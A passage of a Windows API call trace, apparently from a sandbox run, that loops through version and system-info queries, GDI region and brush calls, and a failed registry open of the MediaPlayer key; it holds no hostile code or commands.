szCSDVersion="Service Pack 1")) returned 1 [0017.418] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.418] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.418] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.419] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.419] BeginPath (hdc=0x0) returned 0 [0017.419] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.419] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.419] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.419] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.419] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.419] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.419] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.419] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.419] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9104027d [0017.419] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9b040713 [0017.419] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040889 [0017.419] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104088a [0017.419] CombineRgn (hrgnDst=0x1040889, hrgnSrc1=0x9104027d, hrgnSrc2=0x9b040713, iMode=1) returned 1 [0017.419] CombineRgn (hrgnDst=0x104088a, hrgnSrc1=0x9104027d, hrgnSrc2=0x9b040713, iMode=4) returned 2 [0017.419] CreateSolidBrush (color=0xff) returned 0x2100888 [0017.419] CreateSolidBrush (color=0xff0000) returned 0x110088b [0017.419] DeleteObject (ho=0x110088b) returned 1 [0017.419] DeleteObject (ho=0x9b040713) returned 1 [0017.419] DeleteObject (ho=0x9104027d) returned 1 [0017.419] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.419] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.419] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.419] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.419] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.419] BeginPath (hdc=0x0) returned 0 [0017.419] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.419] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.419] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.419] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.420] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.420] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.420] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.420] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.420] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9c040713 [0017.420] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9204027d [0017.420] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104088c [0017.420] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104088d [0017.420] CombineRgn (hrgnDst=0x104088c, hrgnSrc1=0x9c040713, hrgnSrc2=0x9204027d, iMode=1) returned 1 [0017.420] CombineRgn (hrgnDst=0x104088d, hrgnSrc1=0x9c040713, hrgnSrc2=0x9204027d, iMode=4) returned 2 [0017.420] CreateSolidBrush (color=0xff) returned 0x210088b [0017.420] CreateSolidBrush (color=0xff0000) returned 0x110088e [0017.420] DeleteObject (ho=0x110088e) returned 1 [0017.420] DeleteObject (ho=0x9204027d) returned 1 [0017.420] DeleteObject (ho=0x9c040713) returned 1 [0017.420] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.420] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.420] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.420] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.420] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.420] BeginPath (hdc=0x0) returned 0 [0017.420] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.420] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.420] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.420] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.420] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.420] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.420] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.420] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.421] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9304027d [0017.421] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9d040713 [0017.421] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104088f [0017.421] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040890 [0017.421] CombineRgn (hrgnDst=0x104088f, hrgnSrc1=0x9304027d, hrgnSrc2=0x9d040713, iMode=1) returned 1 [0017.421] CombineRgn (hrgnDst=0x1040890, hrgnSrc1=0x9304027d, hrgnSrc2=0x9d040713, iMode=4) returned 2 [0017.421] CreateSolidBrush (color=0xff) returned 0x210088e [0017.421] CreateSolidBrush (color=0xff0000) returned 0x1100891 [0017.421] DeleteObject (ho=0x1100891) returned 1 [0017.421] DeleteObject (ho=0x9d040713) returned 1 [0017.421] DeleteObject (ho=0x9304027d) returned 1 [0017.421] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.421] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.421] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.421] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.421] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.421] BeginPath (hdc=0x0) returned 0 [0017.421] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.421] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.421] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.421] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.421] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.421] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.422] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.422] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.422] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9e040713 [0017.422] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9404027d [0017.422] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040892 [0017.422] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040893 [0017.422] CombineRgn (hrgnDst=0x1040892, hrgnSrc1=0x9e040713, hrgnSrc2=0x9404027d, iMode=1) returned 1 [0017.422] CombineRgn (hrgnDst=0x1040893, hrgnSrc1=0x9e040713, hrgnSrc2=0x9404027d, iMode=4) returned 2 [0017.422] CreateSolidBrush (color=0xff) returned 0x2100891 [0017.422] CreateSolidBrush (color=0xff0000) returned 0x1100894 [0017.422] DeleteObject (ho=0x1100894) returned 1 [0017.422] DeleteObject (ho=0x9404027d) returned 1 [0017.422] DeleteObject (ho=0x9e040713) returned 1 [0017.422] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.422] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.422] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.422] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.422] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.422] BeginPath (hdc=0x0) returned 0 [0017.422] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.422] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.422] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.422] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.422] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.422] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.422] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.422] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.423] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9504027d [0017.423] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9f040713 [0017.423] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040895 [0017.423] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040896 [0017.423] CombineRgn (hrgnDst=0x1040895, hrgnSrc1=0x9504027d, hrgnSrc2=0x9f040713, iMode=1) returned 1 [0017.423] CombineRgn (hrgnDst=0x1040896, hrgnSrc1=0x9504027d, hrgnSrc2=0x9f040713, iMode=4) returned 2 [0017.423] CreateSolidBrush (color=0xff) returned 0x2100894 [0017.423] CreateSolidBrush (color=0xff0000) returned 0x1100897 [0017.423] DeleteObject (ho=0x1100897) returned 1 [0017.423] DeleteObject (ho=0x9f040713) returned 1 [0017.423] DeleteObject (ho=0x9504027d) returned 1 [0017.423] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.423] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.423] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.423] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.423] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.423] BeginPath (hdc=0x0) returned 0 [0017.423] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.423] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.423] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.423] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.423] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.423] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.423] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.423] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.423] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa0040713 [0017.423] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9604027d [0017.423] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040898 [0017.423] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040899 [0017.424] CombineRgn (hrgnDst=0x1040898, hrgnSrc1=0xa0040713, hrgnSrc2=0x9604027d, iMode=1) returned 1 [0017.424] CombineRgn (hrgnDst=0x1040899, hrgnSrc1=0xa0040713, hrgnSrc2=0x9604027d, iMode=4) returned 2 [0017.424] CreateSolidBrush (color=0xff) returned 0x2100897 [0017.424] CreateSolidBrush (color=0xff0000) returned 0x110089a [0017.424] DeleteObject (ho=0x110089a) returned 1 [0017.424] DeleteObject (ho=0x9604027d) returned 1 [0017.424] DeleteObject (ho=0xa0040713) returned 1 [0017.424] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.424] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.424] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.424] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.424] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.424] BeginPath (hdc=0x0) returned 0 [0017.424] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.424] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.424] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.424] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.424] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.424] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.424] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.424] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.424] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9704027d [0017.424] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa1040713 [0017.424] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104089b [0017.424] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104089c [0017.424] CombineRgn (hrgnDst=0x104089b, hrgnSrc1=0x9704027d, hrgnSrc2=0xa1040713, iMode=1) returned 1 [0017.424] CombineRgn (hrgnDst=0x104089c, hrgnSrc1=0x9704027d, hrgnSrc2=0xa1040713, iMode=4) returned 2 [0017.424] CreateSolidBrush (color=0xff) returned 0x210089a [0017.424] CreateSolidBrush (color=0xff0000) returned 0x110089d [0017.424] DeleteObject (ho=0x110089d) returned 1 [0017.424] DeleteObject (ho=0xa1040713) returned 1 [0017.424] DeleteObject (ho=0x9704027d) returned 1 [0017.425] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.425] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.425] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.425] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.425] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.425] BeginPath (hdc=0x0) returned 0 [0017.425] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.425] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.425] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.425] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.425] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.425] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.425] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.425] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.425] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa2040713 [0017.425] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9804027d [0017.425] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104089e [0017.425] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104089f [0017.425] CombineRgn (hrgnDst=0x104089e, hrgnSrc1=0xa2040713, hrgnSrc2=0x9804027d, iMode=1) returned 1 [0017.425] CombineRgn (hrgnDst=0x104089f, hrgnSrc1=0xa2040713, hrgnSrc2=0x9804027d, iMode=4) returned 2 [0017.425] CreateSolidBrush (color=0xff) returned 0x210089d [0017.425] CreateSolidBrush (color=0xff0000) returned 0x11008a0 [0017.425] DeleteObject (ho=0x11008a0) returned 1 [0017.425] DeleteObject (ho=0x9804027d) returned 1 [0017.425] DeleteObject (ho=0xa2040713) returned 1 [0017.425] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.425] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.425] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.425] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.425] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.426] BeginPath (hdc=0x0) returned 0 [0017.426] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.426] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.426] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.426] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.426] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.426] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.426] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.426] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.426] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9904027d [0017.426] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa3040713 [0017.426] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408a1 [0017.426] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408a2 [0017.426] CombineRgn (hrgnDst=0x10408a1, hrgnSrc1=0x9904027d, hrgnSrc2=0xa3040713, iMode=1) returned 1 [0017.426] CombineRgn (hrgnDst=0x10408a2, hrgnSrc1=0x9904027d, hrgnSrc2=0xa3040713, iMode=4) returned 2 [0017.426] CreateSolidBrush (color=0xff) returned 0x21008a0 [0017.426] CreateSolidBrush (color=0xff0000) returned 0x11008a3 [0017.426] DeleteObject (ho=0x11008a3) returned 1 [0017.426] DeleteObject (ho=0xa3040713) returned 1 [0017.426] DeleteObject (ho=0x9904027d) returned 1 [0017.426] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.426] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.426] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.426] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.426] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.426] BeginPath (hdc=0x0) returned 0 [0017.426] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.426] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.426] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.426] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.426] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 